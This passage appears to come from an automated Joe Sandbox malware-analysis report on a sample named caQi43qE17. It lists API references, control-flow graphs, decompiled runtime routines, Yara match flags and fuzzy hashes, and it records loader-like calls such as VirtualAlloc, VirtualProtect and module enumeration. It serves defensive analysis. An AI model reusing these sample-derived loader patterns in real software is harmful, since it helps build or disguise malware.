                                                                                                                                                                                                    0x0040af8c
                                                                                                                                                                                                    0x0040af98
                                                                                                                                                                                                    0x0040af9a
                                                                                                                                                                                                    0x0040af9a
                                                                                                                                                                                                    0x0040afa3
                                                                                                                                                                                                    0x0040afad
                                                                                                                                                                                                    0x0040afb2
                                                                                                                                                                                                    0x0040afb7
                                                                                                                                                                                                    0x0040afc5
                                                                                                                                                                                                    0x0040afca
                                                                                                                                                                                                    0x0040afd0
                                                                                                                                                                                                    0x0040aec2
                                                                                                                                                                                                    0x0040b6b5
                                                                                                                                                                                                    0x0040b6b7
                                                                                                                                                                                                    0x0040b6bc
                                                                                                                                                                                                    0x0040b6c1
                                                                                                                                                                                                    0x0040b6c4
                                                                                                                                                                                                    0x0040b6c6
                                                                                                                                                                                                    0x0040b6c8
                                                                                                                                                                                                    0x0040b6cf
                                                                                                                                                                                                    0x0040b714
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040b6d1
                                                                                                                                                                                                    0x0040b6d3
                                                                                                                                                                                                    0x0040b6d9
                                                                                                                                                                                                    0x0040b6de
                                                                                                                                                                                                    0x0040b6e4
                                                                                                                                                                                                    0x0040b6e7
                                                                                                                                                                                                    0x0040b6e9
                                                                                                                                                                                                    0x0040b6eb
                                                                                                                                                                                                    0x0040b6ec
                                                                                                                                                                                                    0x0040b6ed
                                                                                                                                                                                                    0x0040b6f3
                                                                                                                                                                                                    0x0040b6f4
                                                                                                                                                                                                    0x0040b6fb
                                                                                                                                                                                                    0x0040b700
                                                                                                                                                                                                    0x0040b704
                                                                                                                                                                                                    0x0040b706
                                                                                                                                                                                                    0x0040b715
                                                                                                                                                                                                    0x0040b723
                                                                                                                                                                                                    0x0040b725
                                                                                                                                                                                                    0x0040b727
                                                                                                                                                                                                    0x0040b73a
                                                                                                                                                                                                    0x0040b73c
                                                                                                                                                                                                    0x0040b725
                                                                                                                                                                                                    0x0040b704
                                                                                                                                                                                                    0x0040b6cf
                                                                                                                                                                                                    0x0040b742
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040af7b
                                                                                                                                                                                                    0x0040af8b
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                                                      • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                      • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                      • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                    • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                                                                                      • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1411284514-0
                                                                                                                                                                                                    • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                                                                                    • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 266 2460481-24604d9 272 24604e5-24604e8 266->272 273 24604db-24604dd 266->273 274 24607f3-2460874 272->274 276 24604ee-24604f0 272->276 273->274 275 24604e3 273->275 275->276 278 24604fa-246053c 276->278 285 24605ae-2460618 278->285 286 246053e-2460570 278->286 305 2460631 285->305 306 246061a-246062f 285->306 295 2460572-2460574 286->295 296 246057c-246057f 286->296 295->274 297 246057a 295->297 296->274 299 2460585-24605a8 296->299 297->299 299->285 307 2460639 305->307 309 2460644-246065a 306->309 307->309 312 2460660-2460674 309->312 313 24606fd-2460719 309->313 316 2460676-246067e 312->316 317 24606ec-24606f0 312->317 321 2460790-24607c1 313->321 322 246071b-2460726 313->322 320 2460684-246068c 316->320 317->312 318 24606f6 317->318 318->313 320->313 323 246068e-246069f LdrInitializeThunk 320->323 336 24607eb-24607f2 321->336 326 2460750-2460774 322->326 327 2460728-246074e 322->327 328 24606a5-24606b4 323->328 341 246077b-2460788 326->341 327->326 334 24606b6-24606e2 328->334 335 24606e4-24606e8 328->335 334->313 335->323 338 24606ea 335->338 338->313 343 246078e 341->343 343->336
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.363962162.0000000002460000.00000040.00000800.00020000.00000000.sdmp, Offset: 02460000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2460000_caQi43qE17.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: :p^
                                                                                                                                                                                                    • API String ID: 0-1306112509
                                                                                                                                                                                                    • Opcode ID: 7c969c2e301072ba4335d8e994f81e1a8e01062a74b202df90622988759d5fa5
                                                                                                                                                                                                    • Instruction ID: eae5e1d95af3d13f51c65b80896fe4b1a86ae5c8a9e645b454070be8357c4f77
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c969c2e301072ba4335d8e994f81e1a8e01062a74b202df90622988759d5fa5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CCA117387506108FC754DF29D598A2AB7F2FF88B14B2190A9E50ACB3B5DB71EC41CB81
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 345 8d76de-8d76f7 346 8d76f9-8d76fb 345->346 347 8d76fd 346->347 348 8d7702-8d770e CreateToolhelp32Snapshot 346->348 347->348 349 8d771e-8d772b Module32First 348->349 350 8d7710-8d7716 348->350 351 8d772d-8d772e call 8d739d 349->351 352 8d7734-8d773c 349->352 350->349 355 8d7718-8d771c 350->355 356 8d7733 351->356 355->346 355->349 356->352
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008D7706
                                                                                                                                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 008D7726
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.363557485.00000000008D6000.00000040.00000020.00020000.00000000.sdmp, Offset: 008D6000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_8d6000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3833638111-0
                                                                                                                                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                    • Instruction ID: 4461be3c971d3a097efe9e6ed44078bafd9cffa3acc609dad24ad024f1b9f910
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EF09C311047156BD7203BF9988DF6E77E8FF45725F100A29E652D11C0EB70EC454751
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 358 40e7ee-40e7f6 call 40e7c3 360 40e7fb-40e7ff ExitProcess 358->360
                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E0040E7EE(int _a4) {
                                                                                                                                                                                                    
                                                                                                                                                                                                    				E0040E7C3(_a4); // executed
                                                                                                                                                                                                    				ExitProcess(_a4);
                                                                                                                                                                                                    			}



                                                                                                                                                                                                    0x0040e7f6
                                                                                                                                                                                                    0x0040e7ff

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                                                                                                                                                                      • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                                                                                                                                                      • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                                                                                                                                                      • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2427264223-0
                                                                                                                                                                                                    • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                                                                                    • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1365 246fdb0-246fe64 VirtualProtect 1368 246fe66-246fe6c 1365->1368 1369 246fe6d-246feb5 1365->1369 1368->1369
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 0246FE54
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.363962162.0000000002460000.00000040.00000800.00020000.00000000.sdmp, Offset: 02460000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2460000_caQi43qE17.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                    • Opcode ID: e81863748750aaed42551b80e21813bdd25f19f01888799bedf4e1edf870af1b
                                                                                                                                                                                                    • Instruction ID: 702d908ee057eb4f25b81a5aff176e154dcddc10b5b6d1ad07e29f0b93761d6b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e81863748750aaed42551b80e21813bdd25f19f01888799bedf4e1edf870af1b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D3199B8D002489FCF14CFAAD984AEEFBB1BF49314F14942AE819B7210D775A945CF94
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1477 50d0130-50d01c6 FindCloseChangeNotification 1481 50d01cf-50d0211 1477->1481 1482 50d01c8-50d01ce 1477->1482 1482->1481
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(?), ref: 050D01B6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.368757015.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_50d0000_caQi43qE17.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2591292051-0
                                                                                                                                                                                                    • Opcode ID: b69ac7093743a329450e6025409ed23401e76fe6558d0c9c0708e7e440fb16df
                                                                                                                                                                                                    • Instruction ID: 8d4b1cb3a7142a0ca6251b8d1fe0037fb4f88dbc36f064e9f5f5154a9177bfa9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b69ac7093743a329450e6025409ed23401e76fe6558d0c9c0708e7e440fb16df
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A31CBB8D012589FDB14CFAAD884A9EFBF5BF49314F14902AE819B7340D735A941CFA4
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1487 50d0138-50d01c6 FindCloseChangeNotification 1490 50d01cf-50d0211 1487->1490 1491 50d01c8-50d01ce 1487->1491 1491->1490
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(?), ref: 050D01B6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.368757015.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_50d0000_caQi43qE17.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2591292051-0
                                                                                                                                                                                                    • Opcode ID: f2a9267c663e3faebb49900c3b82f5acd7297d1720b433e9686b254e20c2607c
                                                                                                                                                                                                    • Instruction ID: f67b6b512027bf5ab067dfd3b65eabbbc510bd47bd6191fd30a867b8a6d998cd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f2a9267c663e3faebb49900c3b82f5acd7297d1720b433e9686b254e20c2607c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1031CBB8D002189FCB14CFAAD884A9EFBB5BF48314F14902AE819B7340D735A941CFA4
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E0040D534(intOrPtr _a4) {
                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                                                                                                    				 *0x4234b4 = _t6;
                                                                                                                                                                                                    				if(_t6 != 0) {
                                                                                                                                                                                                    					 *0x4250b0 = 1;
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					return _t6;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}




                                                                                                                                                                                                    0x0040d549
                                                                                                                                                                                                    0x0040d54f
                                                                                                                                                                                                    0x0040d556
                                                                                                                                                                                                    0x0040d55d
                                                                                                                                                                                                    0x0040d563
                                                                                                                                                                                                    0x0040d559
                                                                                                                                                                                                    0x0040d559
                                                                                                                                                                                                    0x0040d559

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 10892065-0
                                                                                                                                                                                                    • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                                                    • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 25%
                                                                                                                                                                                                    			E0040EA0A(intOrPtr _a4) {
                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                    				void* _t2;
                                                                                                                                                                                                    				void* _t3;
                                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                                    				void* _t5;
                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                    				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
                                                                                                                                                                                                    				return _t2;
                                                                                                                                                                                                    			}









                                                                                                                                                                                                    0x0040ea0f
                                                                                                                                                                                                    0x0040ea11
                                                                                                                                                                                                    0x0040ea13
                                                                                                                                                                                                    0x0040ea16
                                                                                                                                                                                                    0x0040ea1f

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _doexit.LIBCMT ref: 0040EA16
                                                                                                                                                                                                      • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                                                                                                                                                                      • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                                                                                                                                                                      • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                                                                                                                                                                      • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                                                                                                                                                                      • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                                                                                                                                                                      • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                                                                                                                                                                      • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                                                                                                                                                                      • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1597249276-0
                                                                                                                                                                                                    • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                                    • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 008D73EE
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.363557485.00000000008D6000.00000040.00000020.00020000.00000000.sdmp, Offset: 008D6000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_8d6000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                    • Instruction ID: 3aa2d06d39a1cbbefb8d1f948a53e5fbefc7a811d2ee29f9e084e9f23132612c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D112B79A40208EFDB01DF98C985E98BFF5EF08350F058095F9489B362E371EA90DB90
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.363137952.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_74d000_caQi43qE17.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 4b49b802a5628d41e409eceab40c8be93e2a75300d43ce24083db6bcf64f1f02
                                                                                                                                                                                                    • Instruction ID: 9c6cca0d6f92e6c3e5f8a19d96b9704a133486b077eab93f14a870d2505d2840
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b49b802a5628d41e409eceab40c8be93e2a75300d43ce24083db6bcf64f1f02
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA21F4B6500244DFDB25CF54D9C0B26BBA6FB88314F24C669ED894B246C37ADC12DBA1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.363137952.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_74d000_caQi43qE17.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: ecf9803eb92092a6e766669aa078b095f0430dc4d9a18c0d2ee0a053e0f19da5
                                                                                                                                                                                                    • Instruction ID: 0705f4cb12d08f035162e3e8b3d57a70d54a659ac0a14c4bab941c91158837c1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ecf9803eb92092a6e766669aa078b095f0430dc4d9a18c0d2ee0a053e0f19da5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF21F475500240DFDB25DF58D9C4B26FF66FB88314F24C569E8450B246C73ADC26CBA2
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.363137952.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_74d000_caQi43qE17.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 5f8a4a48412f1191aa6a0cefc4e35c7843162ad39462db105bfabc7129468195
                                                                                                                                                                                                    • Instruction ID: c71b854b8e8a1c63cc855e92627f25ea83cbd64b2eb436245c429cec2a7f441a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f8a4a48412f1191aa6a0cefc4e35c7843162ad39462db105bfabc7129468195
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8121F875504244DFDB26CF14D9C0F2ABF66FB98314F24C569E8454B246C33ADC56CBA1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.363137952.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_74d000_caQi43qE17.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 8393c078c223d5c4b9625d332db69b614394e7d280f8e3a9495c0a3175a6893e
                                                                                                                                                                                                    • Instruction ID: cb2cb982bb7fd575ff788f6e19436e4d7f9d0044641c728f9549d141b78aaa37
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8393c078c223d5c4b9625d332db69b614394e7d280f8e3a9495c0a3175a6893e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1121C076504280DFCB16CF10D9C4B1ABF62FB88314F2486A9D8880B256C33AD816CB91
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.363137952.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_74d000_caQi43qE17.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 90244881b989ff30246403fd08531d5cdcc46a0ae5e18fa2708c759c060843b3
                                                                                                                                                                                                    • Instruction ID: b1131e2bf8adfa68691d28276990c560750f3ad0de082103c9ad713ebe095ea0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90244881b989ff30246403fd08531d5cdcc46a0ae5e18fa2708c759c060843b3
